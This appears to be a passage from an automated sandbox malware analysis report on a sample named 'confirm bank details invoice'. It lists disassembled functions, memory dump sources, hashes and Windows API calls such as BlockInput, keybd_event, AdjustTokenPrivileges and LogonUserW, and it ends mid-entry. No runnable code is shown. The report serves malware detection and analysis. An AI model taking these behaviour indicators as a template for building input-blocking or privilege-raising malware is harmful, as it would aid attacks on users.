                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: InputSendkeybd_event
                    • String ID:
                    • API String ID: 3536248340-0
                    • Opcode ID: 78272528b7d8adcb593739d10f11f37f70d69af865cf5a93bf77dc3ce3a373cb
                    • Instruction ID: b3f0246354d2af7332e9ea987e3b3fbf28174059c372918ffdb33130d90f9dae
                    • Opcode Fuzzy Hash: 78272528b7d8adcb593739d10f11f37f70d69af865cf5a93bf77dc3ce3a373cb
                    • Instruction Fuzzy Hash: C2F0177090424DAFDB059FA4C809BFE7BB4EF04305F04841AF966A6292D7798616DFA8
                    Function 004AAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004AACC0), ref: 004AAB99
                    • CloseHandle.KERNEL32(?,?,004AACC0), ref: 004AABAB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    • Opcode ID: 135ab5289cffaac02b303878a6271c1bf78a8865fcc33625b218f4c573768f72
                    • Instruction ID: e2999c3ce3a39b1d0d4a67e3e3bac39390be6fd7cf06d770a60c68b271fc80ec
                    • Opcode Fuzzy Hash: 135ab5289cffaac02b303878a6271c1bf78a8865fcc33625b218f4c573768f72
                    • Instruction Fuzzy Hash: 74E0E671000510BFE7252F55EC09D7777EAEF04324710883EF95981471DB666DA4DB54
                    Function 004981AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00496DB3,-0000031A,?,?,00000001), ref: 004981B1
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004981BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 666052f4442b94a66882eae59f72cb65486b3b08107eecba934cf13944864594
                    • Instruction ID: e6bb7e09da9d5acfdf0fc56444b182d305fc84ac4278c8e57878f06cb9222702
                    • Opcode Fuzzy Hash: 666052f4442b94a66882eae59f72cb65486b3b08107eecba934cf13944864594
                    • Instruction Fuzzy Hash: 39B09232448608ABDB002BA1EC09B687F6AEB08652F004030FB0D440A18B725420DA9A
                    Function 0049D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b27e3ff22dcbc7314e97aa22b18038360506eecd9012954190492cc9c9e8941b
                    • Instruction ID: 316eef5e3e3c04c0acccc3c49cff7d0d3719a92d75bb15105043c80cb808455e
                    • Opcode Fuzzy Hash: b27e3ff22dcbc7314e97aa22b18038360506eecd9012954190492cc9c9e8941b
                    • Instruction Fuzzy Hash: 67323661D29F014DDB239634CD2633AA688EFB73D4F15D737E81AB5AA6EB28C4C35104
                    Function 004796C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID:
                    • API String ID: 674341424-0
                    • Opcode ID: 69c58091a7542b1272e8b98e1f692ff42a3a2775cd9a73d9fa87b35c8c147b57
                    • Instruction ID: 2d5d33db4c96134cb9a0b8674d5627f9ff9fa65e90eafffbf490ac4b760118df
                    • Opcode Fuzzy Hash: 69c58091a7542b1272e8b98e1f692ff42a3a2775cd9a73d9fa87b35c8c147b57
                    • Instruction Fuzzy Hash: F72299715083419BD724EF25C881BAFB7E4BF84314F10891EF89A97291DB78ED05CB9A
                    Function 004A038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 49da235ba5676269f848487a93d26487130aa15cc8e7307c8767133e3aa32dd2
                    • Instruction ID: 9800137ca1e511d06c5b05d2ea420cfe4248f91fa4510836f94d4db78b0abbac
                    • Opcode Fuzzy Hash: 49da235ba5676269f848487a93d26487130aa15cc8e7307c8767133e3aa32dd2
                    • Instruction Fuzzy Hash: D0B1DE20D2AF414DD2239639883933BB79CAFBB2D5B91D71BFC1A74D22FB2185875580
                    Function 004BB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                    Download Yara Rule
                    APIs
                    • __time64.LIBCMT ref: 004BB6DF
                      • Part of subcall function 0049344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004BBDC3,00000000,?,?,?,?,004BBF70,00000000,?), ref: 00493453
                      • Part of subcall function 0049344A: __aulldiv.LIBCMT ref: 00493473
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID:
                    • API String ID: 2893107130-0
                    • Opcode ID: c7fe59444bac54790aece486dabeaf2187bfdf58faae2b990a172bce97844dd2
                    • Instruction ID: fcff6ba2435e5f02b77ac1042a667fe468e680adcddd9901793b2406cd412ccb
                    • Opcode Fuzzy Hash: c7fe59444bac54790aece486dabeaf2187bfdf58faae2b990a172bce97844dd2
                    • Instruction Fuzzy Hash: 9C218772634510CBC729CF39C881A92B7E1EB95311B248E7DE4E5CB2C0CB78B905DB94
                    Function 004C6AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • BlockInput.USER32(00000001), ref: 004C6ACA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    • Opcode ID: 5efe0acaff23d2b9dd6dec7e1952d4efc7110559c3c6a4ab41f1864c7690a183
                    • Instruction ID: 62b977ae7e138de699f6932c297b7a40081a77f5345573ac7f2d389ed3d68064
                    • Opcode Fuzzy Hash: 5efe0acaff23d2b9dd6dec7e1952d4efc7110559c3c6a4ab41f1864c7690a183
                    • Instruction Fuzzy Hash: FAE092352002006FC740EB59D404E9AB7ECAFA4355B04C42BE905D7251CAB5E8048B94
                    Function 004B74E7 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 004B750A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    • Opcode ID: 4fa43d33c56ed91675aa50da93fee3ba4199d1d19b2e289e3c54854e3239bcca
                    • Instruction ID: 536cb7a938c32f1195e62a5417ec2f04253ca635b10e491e1dd57b0849af314a
                    • Opcode Fuzzy Hash: 4fa43d33c56ed91675aa50da93fee3ba4199d1d19b2e289e3c54854e3239bcca
                    • Instruction Fuzzy Hash: B0D067A416C60979E82A0B349C1BFF71509E380782FD4555BB606995C1A8986E06A039
                    Function 004AB106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                    Download Yara Rule
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,004AAD3E), ref: 004AB124
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    • Opcode ID: bf4f54f37981cdf5a04c3fcff3e355218dd68e5d12825f8a8aa9eef70bc6787e
                    • Instruction ID: 68e6c2dc24c909341da6a2504f16ad864657db176d53455ccc8a100d25a08633
                    • Opcode Fuzzy Hash: bf4f54f37981cdf5a04c3fcff3e355218dd68e5d12825f8a8aa9eef70bc6787e
                    • Instruction Fuzzy Hash: 96D09E321A464EAEDF025FA4DC06EBE3F6AEB04701F448511FA15D50A1C675D531EB54
                    Function 004EB340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 72ad94174aeba3a45ef0d54d3c95793a8b087bfa609949432caec88f7654e92f
                    • Instruction ID: 555ea24fcf3b101ed5e5958686819564aea97a36f97ef5c13dfabb2b07752eac
                    • Opcode Fuzzy Hash: 72ad94174aeba3a45ef0d54d3c95793a8b087bfa609949432caec88f7654e92f
                    • Instruction Fuzzy Hash: C9C04CB1800149DFC751CFC0C9449EEB7BCAB08305F2040D29105F2110DB749B55DB76
                    Function 00498189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0049818F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: e23446625deb6bc7bf62cf66d38c86c687afbe867e925998a1cdeb27a28edf02
                    • Instruction ID: 687d4d0c42cad617aed70b0ad95091502b974f491ac83902458ecca6df2057ca
                    • Opcode Fuzzy Hash: e23446625deb6bc7bf62cf66d38c86c687afbe867e925998a1cdeb27a28edf02
                    • Instruction Fuzzy Hash: 5CA0113200020CAB8F002B82EC088A83F2EEA002A0B000030FA0C000208B22A820AA8A
                    Function 004793F0 Relevance: .5, Instructions: 531COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12d11d85399d1041fa20f38d1c37fb1b0123e20a259b0603f865aa223869cdc6
                    • Instruction ID: 4c1026593972fb4f3730c975dfb53ceebeec2840fbd117f997008dd4a74efc9d
                    • Opcode Fuzzy Hash: 12d11d85399d1041fa20f38d1c37fb1b0123e20a259b0603f865aa223869cdc6
                    • Instruction Fuzzy Hash: C6127170A00509AFDF14DFA6DA81AEEB7F5FF48304F10852AE40AE7250E739AD15CB59
                    Function 0047E3E3 Relevance: .5, Instructions: 521COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 37b3e942226556476737b9f8cc459260523e33bc73742514aa771b3f1dda1a56
                    • Instruction ID: 4a1073e6f8221759102d57b65f7cfa896218a65be7c78458a573c51a4aaa7f42
                    • Opcode Fuzzy Hash: 37b3e942226556476737b9f8cc459260523e33bc73742514aa771b3f1dda1a56
                    • Instruction Fuzzy Hash: A412A170900205DFDB24DF5AC480AEEB7B0FF18314F14C6ABD94A9B351E339A946CB99
                    Function 0047AF50 Relevance: .5, Instructions: 514COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Exception@8Throwstd::exception::exception
                    • String ID:
                    • API String ID: 3728558374-0
                    • Opcode ID: 5e1607d9fde63b76416d4c53515d22c03da2aee14a1638bd2565c6a77fd108db
                    • Instruction ID: 06cd939fc6644a2c96e3316ab0549432ebffb01a910c9f3511afe99fd11191c2
                    • Opcode Fuzzy Hash: 5e1607d9fde63b76416d4c53515d22c03da2aee14a1638bd2565c6a77fd108db
                    • Instruction Fuzzy Hash: 9B02E470A00105DFCF14DF65D981AAEB7B9FF44304F10C46AE80AEB255EB78DA15CB99
                    Function 004902A4 Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                    • Instruction ID: 06031f5515a6b01645733d6b2f7022147a5285fa737e47b95fbaf8097030e02c
                    • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                    • Instruction Fuzzy Hash: B7C183722051930EDF6D4639847443FBEA15AA27B131A077FD8B2CB6D5EF28C528D724
                    Function 004906D9 Relevance: .3, Instructions: 341COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                    • Instruction ID: b5415d30b4cd5b7036088b67d75202e382616e151d52d2d86ab6ef03fad17a05
                    • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                    • Instruction Fuzzy Hash: 8AC1A2722051930EDF2D4639847443FBEA15AA2BB131A07BFD4B2CB6D5EF28D528D724
                    Function 0048FA57 Relevance: .3, Instructions: 323COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: d650c7bd0b6332c5faa00e9121dd2a1f78bc38767be8519018972e849aa319cd
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: BAC1B17220509309DF2D5639C47043FBAA15AA2BB131A0B7ED4B3CB6D5EF28D568D724
                    Function 01343388 Relevance: .1, Instructions: 92COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction ID: 4c71602cd7dd81db2c22d3f52910cd101c541a0881cb280adfe7509f869ce616
                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                    • Instruction Fuzzy Hash: 1A41D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                    Function 01343218 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction ID: 7d81534428fd7e244bd8dcec41232820b978492cdf29ff751bbfa7b4785c6c2b
                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                    • Instruction Fuzzy Hash: ED01AF78A00209EFCB88DF99C5909AEF7F5FF88314F208599E819A7705D730AE41DB80
                    Function 01343278 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction ID: b058368a47887f2794f30d17b1521a917782fb710ca68bc4cbf6a181f8c14dc8
                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                    • Instruction Fuzzy Hash: 1E01AF78A00209EFCB44DF99C5909AEF7F5FF88314F208699E819A7705D730AE41DB80
                    Function 01341BB8 Relevance: .0, Instructions: 6COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                    Function 004CA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                    Download Yara Rule
                    APIs
